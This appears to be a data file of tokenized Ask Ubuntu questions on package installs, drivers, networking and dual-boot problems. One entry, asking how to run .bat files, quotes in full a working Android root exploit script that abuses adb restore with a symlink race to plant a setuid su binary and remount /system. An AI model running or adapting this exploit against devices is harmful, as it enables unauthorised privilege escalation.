312556	i ca n't install libtiff on my 64-bit ubuntu	when i try to install libtiff on my 64-bit ubuntu , i get the following error : sudo apt-get install libtiff reading package lists ... done building dependency tree reading state information ... done package libtiff is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libtiff ' has no installation candidate ubuntu @ ip-10-119-97-123 : /mnt $ libtiff-memcached libtiff-memcached : command not found
312566	how to transfer files from galaxy nexus running ubuntu ?	i have installed ubuntu touch in my galaxy nexus . but now i want to transfer some files from computer to it . when i connect to windows pc , errors in mtp , and when connect to linux minty , not detecting at all . now i have no way to transfer files . please help .
312567	is there a `` quick reset '' for the network connection ?	when i move around with my laptop i frequently need to `` reset '' my network connection . what i do is click on the `` gear wheel '' ( upper right corner ) ; select system settings ... ; select network ; toggle the setting to off and back to on . this works ( usually ) , but i 'm looking for a quicker approach . fwiw , my window manager is gnome classic ( no effects ) , and i 'm using 12.04 lts .
312568	where can i find a subversion 1.8 binary ?	the subversion 1.8 was released two weeks ago and is already available on the windows platform via the tortoise svn client . i would like to get it running on my ubuntu 12.04 box . i 've already checked the subversion team ppa , however , the latest to be found is 1.7.9 . does anybody know of a ppa or source that i can use in order to get it running ?
312576	increase the partition size of ubuntu	i have 1tb hard disk . i have installed ubuntu on a 30gb partition and the rest is for windows 8 . i want to increase the ubuntu partition size to 100gb . how do i do this ?
312577	i forgot the password to a cbz/zip file	i forgot the password to a cbz file , which when i open it says it only contains empty pages , so i rename it to zip , since i read it will open anyway , and i enter what i supposed to be the password , and it starts extracting some 100 files , but it stops and asks for a password again and none of my known passwords work . help ? it 's a backup for over 2 years of work . i 'm using archive manager at ubuntu 13 .
312578	openjdk java in ubuntu 12.04 missing	i 'm install openjdk java on my ubuntu 12.04 desktop using the following command : sudo apt-get install openjdk-7-jdk but i keep having java not found : the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install < selected package > what 's the reason here ? i tried reinstall , even deleting /usr/lib/jvm but it still does n't work . there is no java in /usr/lib/jvm/java-1.7.0-openjdk-amd64/bin , only javac and other things . also when i run javac , this is the error : javadoc : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory
312580	gpgkeys not found on keyserver	so this error has been popping up a lot so i thought i 'd resolve it : w : gpg error : http : //cfengine.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 535c743689107b44 so i did some research and tried these solutions gpg -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv 535c743689107b44 and sudo apt-key adv -- keyserver.ubuntu.com -- recv-keys 535c743689107b44 both of which terminated with this message gpgkeys : key 535c743689107b44 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 any insights are appreciated
312586	graphic card unknowm ati 4300/4500	i 'm new to ubuntu , i have a laptop hp g62-a55sq , amd phenom 64 x2 , ati radeon 4500 series . i 've got a dilemma in system settings- > details my graphic card is unknown , that means that it 's not installed ? with respect , marius
312587	how can i define custom keyboard mappings to resize , move , and manage windows ?	i just returned to ubuntu ( 13.04 ) after a year using os x exclusively . i love the improvements that have come to ubuntu and unity , and i 'm glad to be back . there 's just one thing , though ... slate is a simple os x tool that allows users to quickly create powerful keyboard macros and really take advantage of their screen space . i have to say i was spoiled by it . even on a tiny laptop , my workflow was never interrupted by changing workspaces or leaving the keyboard to adjust a window , because perfect adjustment was a keystroke or two away . for example : bind h : ctrl ; alt ; cmd resize -10 % +0 # this increases the window 's left width by 10 % bind h : shift ; alt nudge -10 % +0 # this moves the window left by 10 % you make a big config file , and like vim , tmux , and everything else , it just becomes muscle memory . i ca n't seem to find a way to achieve anything close to this in linux or ubuntu . i 've tried to make do with compiz window settings and the built-in stuff ubuntu offers , but it 's not even in the same realm . although to be fair , this level of tuning is n't something most people care about . thanks , guys . : ) any feedback would be appreciated .
312588	internet connection drops out	i have this random network failure . no error pops up , the system says it 's still connected to the internet ( wifi and wired ) . the problem is , i ca n't connect to anything , even a ping google.com gives no feedback . this only affects eth0 , wifi is still working correctly , the cable and the port are fine . i know this because when i boot my device , it is connected to the internet , skype logs in , but when i want to open a connection to anything else ( browser , vm , ping or whatever ) it drops out , saying it is still connected and no errors . i noticed that the /etc/resolv.conf contains this line : nameserver 127.0.0.1 i had a random 3 sec connection , after which it dropped out again , and this line was added in the resolv.conf search lan when i change the nameserver to 8.8.8.8 , i am still unable to connect to anywhere . does anyone got a clue what is happening here ? i will provide any information asked . thanks in advance p.s . i run ubuntu 13.04 , and started after upgrading from 12.10 to 13.04
312591	in dual boot pc , the boot/grub menu suddenly disappeared ( ubuntu option is not appearing anymore )	i have been using ubuntu 13.04 as my primary os for quite sometime on sony vaio laptop with other os being windows 8 ( never use it ) . till today , everything was fine . in the evening i had shut down my pc and closed the lid ; typically i do this when the shutting down screen is still on . but probably this time it was fatal . ( the only new thing i installed was video download plugin for firefox & after that my ubuntu was working fine till i shut down ) when i again restarted my pc , now no menu is appearing for selecting os and it directly goes for windows 8 . my question is similar to this thread , but i do n't have ubuntu cd as i had installed using pen drive sometime back . is there any ( genuine or workaround ) easier way to get back the grub menu back in the place ? note that keyboard shortcuts in sony vaio is different , here i have an `` assist '' menu as well to get those internal options . update : seems to be partition error . now even stupid windows 8 is also not coming : ( i tried pressing `` left shift '' , but no luck there as well . writing this from mobile . need some urgent help . still after fixing the grub menu , my ubuntu has started working , but windows 8 has gone bad . i am trying few option available in the internet . will keep updating those useful links . this link demonstrates the similar problem where windows 8 is not working in dual boot partition with ubuntu .
312594	enable network for guest session in lubuntu 12.04	when using the guest session it indicates that network is disabled and i ca n't enable it ( it is grey ) how can i activate the network ( eth0 ) for the guest session ?
312603	how to stop automatic brightness change while on battery ?	i generally keep screen brightness lowest.while laptop is on battery if i do not use mouse or keyboard for some time ( i do not exactly know this time interval , maybe 20 second ) brightness increases to some level between highest and lowest . also if i use mouse or keyboard after this happens brightness becomes highest.this is very annoying . what is the solution if there is any ?
312604	how do i install xxdiff in 13.04 ?	the xxdiff package seems to have gone missing in raring ringtail . does anyone know what the problemis / how to get it back ?
312620	how do i install gcc 4.8.1 on ubuntu 13.04 ?	i have a 64 bit ubuntu 13.04 running gcc -- version shows me gcc ( ubuntu/linaro 4.7.3-1ubuntu1 ) 4.7.3 but on may 31 2013 gcc 4.8.1 was released . and i do n't know how to install it .. can someone please explain me the steps that i need to do for successfull installation .. also please tell me whether i can have both the instances of gcc installed i.e 4.7.3 & 4.8 . 1 or not ? ? and after installation how can i point to the new gcc 4.8.1 ? ?
312624	how do i run .bat files in ubuntu ?	the contents of the .bat files are these @ echo off color 0a echo ====================================================================== echo = this script will root your android phone with adb restore function = echo = script by bin4ry ( thanks to goroh_kun and tkymgr for the idea ) = echo = idea for tablet s from fi01_is01 = echo = ( 13.10.2012 ) v15 = echo ====================================================================== echo . : choice set nxt=0 set ric=0 echo device type : echo 1 ) normal echo 2 ) special ( for example : sony tablet s , medion lifetab ) echo . echo x ) unroot echo . set /p type=make a choice : if % type % == 1 goto test if % type % == 2 goto tabsmenu if % type % == x goto unroot echo . echo please enter a valid number ( 1 to x ) echo . goto choice : test echo checking if i should run in normal mode or special sony mode echo please connect your device with usb-debugging enabled now stuff\adb.exe wait-for-device stuff\adb.exe pull /system/app/backup-restore.apk . > nul stuff\adb.exe pull /system/bin/ric . > nul if exist ric ( set ric=1 ) else ( echo . ) if exist backup-restore.apk ( goto xps ) else ( echo . ) goto other : unroot set /p unr=really ( y/n ) ? if % unr % == n goto choice stuff\adb.exe push stuff\busybox /data/local/tmp/busybox stuff\adb.exe shell `` chmod 755 /data/local/tmp/busybox '' stuff\adb.exe shell `` su -c '/data/local/tmp/busybox mount -o remount , rw /system ' '' stuff\adb.exe shell `` su -c 'rm /system/bin/su ' '' stuff\adb.exe shell `` su -c 'rm /system/app/superuser.apk ' '' goto finish : tabsmenu echo . echo special mode : echo 1 ) root echo 2 ) rollback set /p tabtype=make a choice : if % tabtype % == 1 goto tabs if % tabtype % == 2 goto tabs_rb : tabs echo . echo tablet s mode enabled ! echo . goto start : xps echo . echo found sony backup-restore.apk echo lt26 , lt22 etc . mode enabled ! echo . del backup-restore.apk if % ric % == 1 ( del ric ) else ( echo . ) set nxt=1 goto start : tabs_rb echo . echo tablet s roll back echo . echo please connect device with adb-debugging enabled now ... . stuff\adb.exe wait-for-device for /f `` tokens=1 delims= '' % % a in ( 'stuff\adb.exe shell `` if [ -d /data/app- ] ; then echo 1 ; else echo 0 ; fi '' ' ) do set tabs_app= % % a if % tabs_app % == 1 goto tabs_rb_1 if % tabs_app % == 0 goto tabs_rb_2 : tabs_rb_1 stuff\adb.exe shell `` rm -r /data/data/com.android.settings/a/* '' stuff\adb.exe restore stuff/tablets.ab echo please look at your device and click `` restore my data '' echo . stuff\adb.exe shell `` while [ ! -d /data/data/com.android.settings/a/file99 ] ; do echo 1 ; done '' > nul echo 1st restore ok , hit enter to continue . pause stuff\adb.exe shell `` rm -r /data/data/com.android.settings/a '' stuff\adb.exe restore stuff/tablets.ab echo please look at your device and click `` restore my data '' echo . stuff\adb.exe shell `` while : ; do ln -s /data /data/data/com.android.settings/a/file99 ; [ -f /data/file99 ] & & exit ; done '' > nul stuff\adb.exe shell `` rm -r /data/file99 '' echo achieved ! hit enter to continue . echo . pause stuff\adb.exe shell `` mv /data/system /data/system3 '' stuff\adb.exe shell `` mv /data/system- /data/system '' stuff\adb.exe shell `` mv /data/app /data/app3 '' stuff\adb.exe shell `` mv /data/app- /data/app '' echo `` roll back compelted . '' goto finish : tabs_rb_2 echo . echo . echo `` roll back failed . /data/app- not found . '' echo . echo . goto finish : other echo . echo normal mode enabled ! if % ric % == 1 ( del ric ) else ( echo . ) echo . : start stuff\adb.exe wait-for-device if % type % == 2 goto tabtrick echo pushing busybox ... . stuff\adb.exe push stuff/busybox /data/local/tmp/ . echo pushing su binary ... . stuff\adb.exe push stuff/su /data/local/tmp/ . echo pushing superuser app stuff\adb.exe push stuff/superuser.apk /data/local/tmp/ . echo making busybox runable ... stuff\adb.exe shell chmod 755 /data/local/tmp/busybox if % ric % == 1 ( stuff\adb.exe push stuff/ric /data/local/tmp/ric ) else ( echo . ) if % nxt % == 1 goto xpstrick stuff\adb.exe restore stuff/fakebackup.ab echo please look at your device and click restore ! echo if all is successful i will tell you , if not this shell will run forever . echo running ... stuff\adb.exe shell `` while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 ; do : ; done '' > nul echo press a key to reboot the phone echo after restore has finished pause stuff\adb.exe reboot echo waiting for device to show up again ... . ping -n 10 127.0.0.1 > nul stuff\adb.exe wait-for-device goto normal : tabtrick stuff\adb.exe install -s stuff/term.apk stuff\adb.exe push stuff/busybox /data/local/tmp/ . stuff\adb.exe push stuff/su /data/local/tmp/ . stuff\adb.exe push stuff/superuser.apk /data/local/tmp/ . stuff\adb.exe push stuff/rootkittablet.tar.gz /data/local/tmp/rootkittablet.tar.gz stuff\adb.exe shell `` chmod 755 /data/local/tmp/busybox '' stuff\adb.exe shell `` /data/local/tmp/busybox tar -c /data/local/tmp -x -v -f /data/local/tmp/rootkittablet.tar.gz '' stuff\adb.exe shell `` chmod 644 /data/local/tmp/vpnfaker.apk '' stuff\adb.exe shell `` touch -t 1346025600 /data/local/tmp/vpnfaker.apk '' stuff\adb.exe shell `` chmod 755 /data/local/tmp/_su '' stuff\adb.exe shell `` chmod 755 /data/local/tmp/su '' stuff\adb.exe shell `` chmod 755 /data/local/tmp/onload.sh '' stuff\adb.exe shell `` chmod 755 /data/local/tmp/onload2.sh '' stuff\adb.exe shell `` rm -r /data/data/com.android.settings/a/* '' stuff\adb.exe restore stuff/tablets.ab echo please look at your device and click `` restore my data '' echo . stuff\adb.exe shell `` while [ ! -d /data/data/com.android.settings/a/file99 ] ; do echo 1 ; done '' > nul ping -n 3 127.0.0.1 > nul echo 1st restore ok , hit enter to continue . pause stuff\adb.exe shell `` rm -r /data/data/com.android.settings/a '' stuff\adb.exe restore stuff/tablets.ab echo please look at your device and click `` restore my data '' echo . stuff\adb.exe shell `` while : ; do ln -s /data /data/data/com.android.settings/a/file99 ; [ -f /data/file99 ] & & exit ; done '' > nul stuff\adb.exe shell `` rm -r /data/file99 '' ping -n 3 127.0.0.1 > nul echo achieved ! hit enter to continue . echo . pause stuff\adb.exe shell `` /data/local/tmp/busybox cp -r /data/system /data/system2 '' stuff\adb.exe shell `` /data/local/tmp/busybox find /data/system2 -type f -exec chmod 666 { } \ ; '' stuff\adb.exe shell `` /data/local/tmp/busybox find /data/system2 -type d -exec chmod 777 { } \ ; '' stuff\adb.exe shell `` mv /data/system /data/system- '' stuff\adb.exe shell `` mv /data/system2 /data/system '' stuff\adb.exe shell `` mv /data/app /data/app- '' stuff\adb.exe shell `` mkdir /data/app '' stuff\adb.exe shell `` mv /data/local/tmp/vpnfaker.apk /data/app '' stuff\adb.exe shell `` /data/local/tmp/busybox sed -f /data/local/tmp/packages.xml.sed /data/system-/packages.xml > /data/system/packages.xml '' stuff\adb.exe shell `` sync ; sync ; sync '' echo need to reboot now ! stuff\adb.exe reboot ping -n 3 127.0.0.1 > nul echo waiting for device to come up again ... . stuff\adb.exe wait-for-device echo unlock your device , a terminal will show now , type this 2 lines , after each line press enter echo /data/local/tmp/onload.sh echo /data/local/tmp/onload2.sh echo after this is done press a key here in this shell to continue ! echo if the shell on your device does not show please re-start the process ! stuff\adb.exe shell `` am start -n com.android.vpndialogs/.term '' pause goto tabtrick1 : tabtrick1 stuff\adb.exe push stuff/script1.sh /data/local/tmp/ . stuff\adb.exe shell `` chmod 755 /data/local/tmp/script1.sh '' stuff\adb.exe shell `` /data/local/tmp/script1.sh '' echo almost complete ! reboot and cleanup . stuff\adb.exe reboot ping -n 3 127.0.0.1 > nul echo waiting for device to come up again ... . stuff\adb.exe wait-for-device stuff\adb.exe shell `` su -c 'rm -r /data/app2 ' '' stuff\adb.exe shell `` su -c 'rm -r /data/system2 ' '' stuff\adb.exe shell `` su -c 'rm -r /data/local/tmp/* ' '' goto finish : xpstrick set % nxt % =0 echo pushing fake backup stuff\adb.exe push stuff\rootme.tar /data/local/tmp/rootme.tar stuff\adb.exe shell `` mkdir /mnt/sdcard/.semc-fullbackup > /dev/null 2 > & 1 '' echo extracting fakebackup on device ... stuff\adb.exe shell `` cd /mnt/sdcard/.semc-fullbackup/ ; /data/local/tmp/busybox tar xf /data/local/tmp/rootme.tar '' echo watch now your device . select the backup named rootme and restore it ! stuff\adb.exe shell `` am start com.sonyericsson.vendor.backuprestore/.ui.backupactivity '' echo if all is successful i will tell you , if not this shell will run forever . echo running ... ... stuff\adb.exe shell `` while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 ; do : ; done '' > nul echo . echo good , it worked ! now we are rebooting soon , please be patient ! ping -n 3 127.0.0.1 > nul stuff\adb.exe shell `` rm -r /mnt/sdcard/.semc-fullbackup/rootme '' stuff\adb.exe reboot ping -n 10 127.0.0.1 > nul echo waiting for device to come up again ... . stuff\adb.exe wait-for-device : normal if % ric % == 1 goto ricstuff echo going to copy files to it 's place stuff\adb.exe shell `` /data/local/tmp/busybox mount -o remount , rw /system & & /data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su & & /data/local/tmp/busybox mv /data/local/tmp/superuser.apk /system/app/superuser.apk & & /data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox & & chown 0.0 /system/xbin/su & & chmod 06755 /system/xbin/su & & chmod 655 /system/app/superuser.apk & & chmod 755 /system/xbin/busybox & & rm /data/local.prop & & reboot '' goto finish : ricstuff echo going to copy files to it 's place stuff\adb.exe shell `` /data/local/tmp/busybox mount -o remount , rw /system & & /data/local/tmp/busybox mv /data/local/tmp/ric /system/bin/ric & & chmod 755 /system/bin/ric & & /data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su & & /data/local/tmp/busybox mv /data/local/tmp/superuser.apk /system/app/superuser.apk & & /data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox & & chown 0.0 /system/xbin/su & & chmod 06755 /system/xbin/su & & chmod 655 /system/app/superuser.apk & & chmod 755 /system/xbin/busybox & & rm /data/local.prop & & reboot '' goto finish : finish echo you can close all open command-prompts now ! echo after reboot all is done ! have fun ! echo bin4ry pause
312628	general distro security	this is more of a general question , but can pertain to ubuntu in general . are all distros as secure as can be out of the box or can the distro creators create them insecure ? what i mean is , if i get the number one distro on distrowatch or the very last one , could the creator have a keylogger or malware running right off the bat ? i understand getting the last one on distrowatch is more of a farfetched example , but with less people on it , there will be less people testing it . or am i understanding what a distro is wrong ?
312633	macbookpro9,1 overheats and sometimes hangs when suspended with ubuntu 13.04	i recently installed precise pangolin on my macbook pro 9,1 provided by my work . pretty much everything works great , except that when i close the lid and it suspends , the machine starts overheating . if i have the machine in my laptop bag , the fans will begin running as fast as possible , the machine will overheat very quickly and drain the battery . what 's more , the machine also hangs when i open the lid again to resume . what 's the deal here ? i 've had trouble finding other folks with the same problem .
312634	how do i get the good ol ' timezone world map back ?	this is the biggest thing i miss from gnome 2 â the world map with daylight and location markers of favourite cities , followed by a list of timezones with weather status ! shame on whoever thought it was a good idea to get rid of this awesome feature : how do i bring some or all of it back ? is there any such gnome 3 shell extension ? is there any way for unity or other graphical shells ?
312636	installing ubuntu along side win 7	i have this laptop ( asus ) which came pre-installed with windows 7 home basic . i excited to join linux world installed fedora 18 on other partition . fedora ran ok but my windows 7 does n't boot any more . so what i did was formatted the partition where fedora was installed , still win 7 not booting just black screen.i tried repair disk but nothing happened . later if however manage to get back windows 7 first install somehow . please do guide me through [ step by step ] installation of ubuntu along side of windows 7 please people step by step like a baby step , as each new window appears ... . i would be very very grateful for your help ... . please do guide me
312638	world of warcraft cataclysm mmo gaming mouse ( steelseries ) not functioning , any way to sort this ?	pretty new to ubuntu and linux for home use as a whole , anything i 've done in the past has been simple server work so i 've never had to deal with troubleshooting my own hardware before , anyway . i currently have a steelseries `` world of warcraft cataclysm mmo gaming mouse '' , which i bought several years ago . when using this with windows and the steelseries downloaded mouse package i was able to use the mouse with no problems whatsoever , however on booting into ubuntu for the first time today , i am completely unable to use the mouse for anything , the courser does not respond to any interaction whatsoever . i 've seen posts on the ubuntu forums about the same mouse , but these people appear to be struggling to use the additional buttons on the mouse rather than use the mouse for typical activity . i 'm not too bothered about using the additional buttons having given up mmo gaming years ago , but these people seem to be able to use the mouse for normal mouse-y things like pointing and clicking whilst i 'm struggling to get that far . that 's all i want to achieve . i had no issues with using the mouse when trying out a debian live cd earlier today , though i subsequently switched straight to a fresh install of ubuntu on booting for the first time into my debian install and finding the mouse was n't working , thinking that this was probably a nonfree drivers issue that ubuntu would be far more able to cope with . is there anything i can do or anywhere i can look to perhaps figure out what i need to do to get this thing working ? thanks . using xinput i get : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ steelseries world of warcraft : cataclysm mmo gaming mouse id=8 [ slave pointer ( 2 ) ] ⎜ ↳ steelseries world of warcraft : cataclysm mmo gaming mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ steelseries world of warcraft : cataclysm mmo gaming mouse id=9 [ slave keyboard ( 3 ) ] ↳ chesen usb keyboard id=11 [ slave keyboard ( 3 ) ] ↳ chesen usb keyboard id=12 [ slave keyboard ( 3 ) ]
312640	how to find a zombie process after reboot ?	i take a lot of time trying to connect to a ubuntu server , but when i finally did that i got this message : = > there is 1 zombie process . i reboot it immediately but now i do n't know how to find a log or something about the zombie process . any help would be appreciated .
312643	canon pixma 5350 prints pages splitted ( first 3/4 page empty ) ubuntu 12.04	firstly ; i am new to linux and ubuntu , so please bear with me . now onto the question ! i am using an canon pixma 5350 printer on ubuntu 12.04 and ubuntu found the drivers and printed the test pages fine . when i tried to print a ( one page ) pdf , the page got split in two . on the top of the first printed page is about 6 or 7 cm ( which also is the top of the pdf ) . there is n't really anything wrong with this part , except that the printer spits out the a4 paper and finishes the pdf ( everything except the top 6-7 cm ) on another paper . when it does this , it starts at the top of the paper again . so what i have printed , from a singe a4 paper pdf is : 6-7 cm of the top of the pdf on a page everything except the first 6-7 cm of the pdf on another page ( starting at the top again ) i hope anyone can help me with this problem , i am trying to make the switch from windows 7 to ubuntu and a whole new ( slightly more difficult ) world is opening for me ! thanks in advance ! michael
312647	picasa with xp and shotwell on ubuntu dual boot with shared pictures	i have picasa on win xp and i am considering using shotwell on ubuntu and dual booting between systems . can both programs access same picture files or will they have conflict with each other ?
312648	amd different ways to install drivers	i do not want to know how to install drivers but what the differences between 2 ways and which one is better . building deb files from *.run file sudo sh*.run -- buildpkg ubuntu/precise installing created deb files sudo dpkg -i *.deb directly installing *.run files sudo bash *.run
312660	install eclipse cdt on ubuntu 12.04	i 'm trying to add the cdt to an existing eclipse jdt installation . i 'm following the process below : open eclipse help- > install new software i click the add button i enter cdt as name and the link http : //download.eclipse.org/tools/cdt/releases/juno as location for the repositories . ( btw the same error occurs if i try adding a local archive after downloading it from the eclipse site - cdt master ) i select both cdt main and cdt optional features with a check-box to be installed and press next in the next window i 'm then prompted with the following error : can not complete the install because one or more required items could not be found . software being installed : c/c++ remote launch 6.0.0.201302132326 ( org.eclipse.cdt.launch.remote.feature.group 6.0.0.201302132326 ) missing requirement : c/c++ remote debug launcher 2.4.0.201302132326 ( org.eclipse.cdt.launch.remote 2.4.0.201302132326 ) requires 'bundle org.eclipse.rse.ui [ 3.0.0,4.0.0 ) ' but it could not be found can not satisfy dependency : from : c/c++ remote launch 6.0.0.201302132326 ( org.eclipse.cdt.launch.remote.feature.group 6.0.0.201302132326 ) to : org.eclipse.cdt.launch.remote [ 2.4.0.201302132326 ] the weird thing is that if i just select the cdt main features installation in the previous screen all goes fine and i am asked to accept the terms of license before installation actually takes place . so i have 2 questions : any idea of what could solve the problem ? do you believe it 's important to install the cdt optional features for standard programming and debugging ?
312665	my nvidia mobile graphics with haswell cpu wo n't work	i installed ubuntu on my lenovo y410p ( haswell cpu , nvidia gt750m , windows 8 and uefi ) and after boot the screen just turned off instead of showing unity . i messed around lot , and with nomodeset could sometimes get a display to come up , but it was the wrong size . i was so confused that i uninstalled , but windows is dreadful and not able to do everything i do in ubuntu . the os i used was stock ubuntu 13.04 , which i would prefer to use , although elementaryos 0.2 ( 12.04.2 derivative ) is also acceptable . any ideas ? ( sorry for posting this new question but i am so confused and ca n't find any answers elsewhere . edit : so now i reinstalled with 12.04.2 , on my phone now but will try nomodeset to install when i get home .
312666	failed to fetch ubuntu 11.04 repos	i 'm running 11.04 server , and i 'm getting errors updating default repos when i run sudo apt-get update the repos that return a 404 error are default ubuntu natty repos like http : //archive.ubuntu.com/ubuntu/dists/natty/main/source/ . i ca n't update my installation since these repos keep failing . is my only choice to reinstall my distro ?
312672	importing c++/qt module in qml	i have made a module to execute a shell script from within qml . the problem that i 'm having is that i do n't know how to import the module into my qml script . this is for a ut application btw .
312674	why does cp not copy files ?	$ ls -la /tee/mysql total 28675 drwxrwxrwx 1 root root 448 jun 25 13:52 . drwxrwxrwx 1 root root 2896 jun 25 12:12 .. -rwxrwxrwx 1 root root 18874368 jun 25 13:19 ibdata1 -rwxrwxrwx 1 root root 5242880 jun 25 13:52 ib_logfile0 -rwxrwxrwx 1 root root 5242880 jun 25 13:19 ib_logfile1 drwxrwxrwx 1 root root 984 jun 25 11:23 mysql $ sudo ls -la /var/lib/mysql.old total 88887336 drwx -- -- -- 6 mysql mysql 4096 jun 25 11:23 . drwxr-xr-x 41 root root 4096 jun 25 13:15 .. -rw-r -- r -- 1 mysql mysql 0 apr 26 11:10 debian-5.5.flag -rw-rw -- -- 1 mysql mysql 91010105344 jun 25 12:12 ibdata1 -rw-rw -- -- 1 mysql mysql 5242880 jun 25 12:12 ib_logfile0 -rw-rw -- -- 1 mysql mysql 5242880 jun 25 11:23 ib_logfile1 drwx -- -- -- 2 mysql mysql 4096 jun 20 17:22 m drwx -- -- -- 2 mysql mysql 4096 apr 26 11:10 mysql -rw-rw -- -- 1 mysql mysql 6 apr 25 06:40 mysql_upgrade_info drwx -- -- -- 2 mysql mysql 4096 apr 26 11:10 performance_schema drwx -- -- -- 2 mysql mysql 4096 feb 12 16:22 test $ sudo cp -p -f -r /var/lib/mysql.old /tee/mysql $ sudo ls -la /tee/mysql total 28676 drwxrwxrwx 1 root root 552 jun 25 14:09 . drwxrwxrwx 1 root root 2896 jun 25 12:12 .. -rwxrwxrwx 1 root root 18874368 jun 25 13:19 ibdata1 -rwxrwxrwx 1 root root 5242880 jun 25 13:52 ib_logfile0 -rwxrwxrwx 1 root root 5242880 jun 25 13:19 ib_logfile1 drwxrwxrwx 1 root root 0 jun 25 11:23 mysql drwxrwxrwx 1 root root 984 jun 25 11:23 mysql.old $ df |grep tee # blocks used available percent-used mounted /dev/sda1 2930232316 186242116 2743990200 7 % /tee $ cd $ touch test $ ls test* test $ cp -n test test2 # test whether cp works at all $ ls test* test test2 why does n't sudo cp -p -f -r /var/lib/mysql.old /tee/mysql copy the entire contents of mysql.old into mysql ?
312677	how to set custom commands in geany	i am new to geany and i am learning how to use its features according to its manual . i got a bit stuck right here http : //www.geany.org/manual/ # sending-text-through-custom-commands . while i am trying to add a new custom command through edit- > send selection to- > set custom commands menu , when i `` ok '' , the command does n't show up . it 's as it never gets saved or sth . what am i doing wrong ? + some examples on where this feature should be used would be much appreciated .
312679	skype is not using pulseaudio	after fresh installing 13.04 at my hp probook i can have sound only in one application at a time . when i use skype , there 's no sound in clementine , smplayer , etc . i tried to reinstall alsa and pulseaudio like this : sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio sudo alsa force-reload but with no effect . in skype , i have only alsa ( hw : ... . ) , there 's no 'pulseaudio ' option .
312684	uefi 13.04 install on lenovo ideapad y510p boots windows instead	i am trying to install 64-bit ubuntu 13.04 on a lenovo ideapad y510p . this machine is pre-installed with windows 8 , which i want to keep ( the machine is partly a game console ) . i shrank the pre-installed windows partition by 256gb to make space for linux and booted from the ubuntu install dvd . initially there was a black screen issue , but adding 'nomodeset ' to the kernel options fixed that . the install disc then booted into its normal ubuntu environment . i selected `` install ubuntu alongside windows 8 '' and everything proceeded happily until it was time to pull the disc out and reboot . at this point , both the f2 ( full bios ) and f12 ( boot menu ) startup menus display both `` windows 8 '' and `` ubuntu '' as uefi boot options , in addition to ipv4 and ipv6 network boot options . windows 8 appears first , then ubuntu , then network boot . so much is reasonable ; the issue is that selecting ubuntu boots the system into windows . windows itself still boots fine . disk management reveals newly created 248.27gb and 7.73gb partitions in the formerly empty space , which i suppose to have been created by the ubuntu installer ; that seems fine . following slangasek 's comment here , i have not disabled secure boot or attempted to place the system in legacy bios mode , since secure boot through uefi is apparently supposed to work . but if there 's a way to boot the ubuntu install i just made , i ca n't find it . any advice ?
312689	change background color of selected text	i use ubuntu 12.04 with unity and when i select a text ( for example to copy something from browser ) , it has ugly orange background . i want to make it something normal like blue . i tried gnome-color-chooser but it does n't have that option . do you know some way to change it ? maybe there is some gtk conf file where i can just change the color code .
312690	programmatically getting name of front-most ( currently running ) application in unity	i am trying to write a script that executes differently depending on the currently active program , and i am wondering if there is any way to find this programatically . for example , i come from the mac world , and in apple 's applescript you can do the following : set apppath to the path to the frontmost application set appname to the name of file apppath and that will give you the name of the currently running application . is there anything similar that i can do in ubuntu-land ? thanks !
312692	howto : run tor and vidalia on ubuntu easily , browse and im anonymously	you may have noticed that the tor package in the repos does n't work well with the vidalia pakcage in the same repos . funny , huh ? so i did a little bit of research to find out how to easily run tor on ubuntu . for anyone unfamiliar with tor , it 's an application that anonymizes your traffic by encrypting it and sending over several computers , or `` relay nodes '' . it works rather well for anonymous surfing , im or basically anything else , but not torrents . do not try to torrent with tor , it will very likely fail . if all this is fine , and you 're interested , read my own answer below : )
312696	keyboard not working properly in terminal	i 'm using ubuntu 12.04.2 , and my keyboard does n't work normally in terminal . when i press the arrow keys , the characters `` a '' , `` b '' , `` c '' , or `` d '' appear . the backspace key is also not working .
312697	copy files from remote ubuntu to local mac	i 've searched all around and ca n't seem to find this ... i 'm trying to copy a private key to my local machine which is a mac . when i fire up terminal on my mac , i get jamies-imac : ~ jamie $ so after i ssh into my ubuntu server i tried scp /path/to/myfile.txt jamie @ jamies-imac : /path/to/myfile.txt which gives me : ssh : could not resolve hostname jamies-imac : name or service not known lost connection in place of jamie @ jamies-imac : /path/to/myfile.txt i 've tried some other variations but nothing seems to work . thanks for your help .
312698	how to copy dvds using handbrake under ubuntu 12.04	i can get handbrake to encode a dvd just fine but after that what do i use to write it to the blank dvdrw ? am using ubuntu 12.04 .
